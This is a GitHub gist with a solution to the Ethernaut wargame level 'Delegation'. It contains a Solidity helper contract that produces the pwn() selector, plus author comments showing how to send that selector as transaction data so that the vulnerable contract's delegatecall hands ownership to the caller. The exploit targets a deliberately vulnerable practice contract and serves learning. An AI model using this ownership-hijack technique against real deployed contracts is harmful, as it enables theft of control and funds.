Skip to content

Instantly share code, notes, and snippets.

@SilviaMargaritaOcegueda

SilviaMargaritaOcegueda/DelegationHack.sol

Created June 25, 2022 19:08
Show Gist options
  • Save SilviaMargaritaOcegueda/8163b5c90e4540f2b19cd35f6b31af74 to your computer and use it in GitHub Desktop.
Save SilviaMargaritaOcegueda/8163b5c90e4540f2b19cd35f6b31af74 to your computer and use it in GitHub Desktop.
Download ZIP
Level 6 - Delegation - Ethernaut
Raw
DelegationHack.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract DelegationHack {
function delegationHack() public pure returns (bytes memory) {
bytes memory functionID = abi.encodeWithSignature("pwn()");
return functionID;
}
}
@SilviaMargaritaOcegueda
Copy link
Author

Option 1:

  1. deploy a contract to get the 4 bytes signature of the function pwn()
  2. await contract.sendTransaction({data: "0xdd365b8b"}); // function ID, selector or signature

Option 2:

  1. Call the pwn() function
    const data = web3.utils.sha3("pwn()"); // this retrieves the complete hash instead of the first 4 bytes
  2. Pass this information to the data property which will assign msg.data
    await contract.sendTransaction({ data });

Finally, check on who’s now the owner of the contract:
await contract.owner();

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment